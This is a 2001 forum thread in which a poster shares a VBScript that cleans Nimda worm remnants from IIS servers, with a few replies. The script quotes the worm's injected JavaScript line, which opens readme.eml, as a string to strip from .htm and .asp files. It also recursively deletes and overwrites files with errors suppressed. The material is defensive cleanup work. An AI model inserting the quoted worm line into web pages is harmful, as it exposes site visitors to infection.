Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Free Nimda worm cleaner for IIS

  • 19-09-2001 4:37pm
    #1
    Closed Accounts Posts: 74 ✭✭


    Hi,

    We have written a vbs script file that can be used to help clear Nimda from an infected IIS web server. If goes through all web site folders and removes the javascript inserted by Nimda in HTML & ASP files. Also deletes readme.eml wherever it finds it.

    Handy if your server has lots of sites / files on it.

    Anybody who wants it can contact me directly.

    It's free!


Comments

  • Registered Users, Registered Users 2 Posts: 16,414 ✭✭✭✭Trojan


    Can you link or paste the source here for us?

    That would be handy... otherwise people will probably go to the AV centres to get disinfecters.

    Al.


  • Closed Accounts Posts: 74 ✭✭Anemone


    Here's the source code. It's quick & dirty. I know it works though, cos we used it to clean a server with lots of sites on it. Use it entirely at your own risk etc. etc. Save it with a .vbs extension and double-click to run. It will ask what folder to run from. You may have to fix any line wrapping that Boards does.

    'START COPYING HERE

    '************************************
    'Nimda worm cleaner for IIS web servers
    '************************************
    'Starting at the specified root folder
    'this script builds a list of all files in
    'the tree below that root folder.
    'It then deletes any files in the list
    'that are called readme.eml.
    'It removes the Nimda javascript line
    'from any files with an asp or htm extension.
    'Results are reported at the end.

    '*****************************************************
    'WARNING: THIS SCRIPT MODIFIES AND / OR DELETES FILES.
    'USE AT YOUR OWN RISK ONLY.
    'AUTHOR ACCEPTS NO RESPONSIBILITY
    'FOR LOSS OR DAMAGE CAUSED BY THIS SCRIPT
    '*****************************************************


    '***************************
    'GET A LIST OF ALL THE FILES INTO AN ARRAY
    '***************************

    'Ignore errors (in case of locked files or permission problems)
    on error resume next

    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")

    strPath = InputBox ("Enter the Root Folder to start on","Root Folder" )

    Dim rootFolder
    Set rootFolder = fso.GetFolder(strPath)

    ReDim FileList(1)

    Call AddFolders(rootFolder)

    '***************************
    'EDIT THE FILES AS NECESSARY
    '**************************
    varEdit = 0
    varDel = 0

    Dim stream
    for x = 0 to ubound(FileList)

    if len(trim(FileList(x))) > 0 then

    'Delete the file if it is readme.eml
    if right(FileList(x),10) = "readme.eml" then
    fso.DeleteFile FileList(x), True

    varDel = varDel + 1

    'If it's a htm or asp take the worm javascript out of it
    elseif right(FileList(x),3) = "htm" or right(FileList(x),3) = "asp" then

    Set stream = fso.OpenTextFile(FileList(x))
    strFileContents = stream.ReadAll
    stream.close
    set stream = nothing

    WormText = "<html><script language=""JavaScript"">window.open(""readme.eml"", null, ""resizable=no,top=6000,left=6000"")</script></html>"
    strFileContents = Replace(strFileContents, WormText, "", 1, -1, 1)

    'Write the file back out, overwriting the original
    Call MakeFile(FileList(x), strFileContents)

    varEdit = varEdit + 1

    end if
    end if
    next


    '**********
    'FINISHED
    '**********
    MsgBox "Files Deleted: " & varDel & vbCrLf & "Files Cleaned: " & varEdit, 0, "Finished"
    wscript.quit


    sub AddFolders(objFolder)

    dim files
    set files = objFolder.Files

    For Each file in files
    strFullPath = file.Path
    LastItem = ubound(FileList)
    FileList(LastItem) = strFullPath
    ReDim Preserve FileList(LastItem + 1)
    Next
    set files = nothing

    Dim subFolders
    Set subFolders = objFolder.SubFolders

    For Each folder in subFolders
    Call AddFolders(folder)
    Next
    set subFolders = nothing

    end sub

    sub MakeFile(NameOfFile, FileContents)

    Dim objFSO2, objFile2
    Set objFSO2 = CreateObject("Scripting.FileSystemObject")

    Set objFile2 = objFSO2.CreateTextFile(NameOfFile,True)
    objFile2.Write FileContents

    objFile2.Close
    Set objFile2 = Nothing
    Set objFSO2 = Nothing
    end sub

    'STOP COPYING HERE


  • Closed Accounts Posts: 74 ✭✭Anemone


    I forgot to mention when posting the source code that there is no point in using the script unless the executables infected with Nimda code, registry changes made by Nimda etc. have been fixed beforehand, because Nimda will just reinfect the files again after you run the script.

    The main reason we wrote this script was to help clean up web sites after the active part of the Nimda infection has been removed.


  • Registered Users, Registered Users 2 Posts: 5,335 ✭✭✭Cake Fiend


    There's a link to a removal tool on www.symantec.com


Advertisement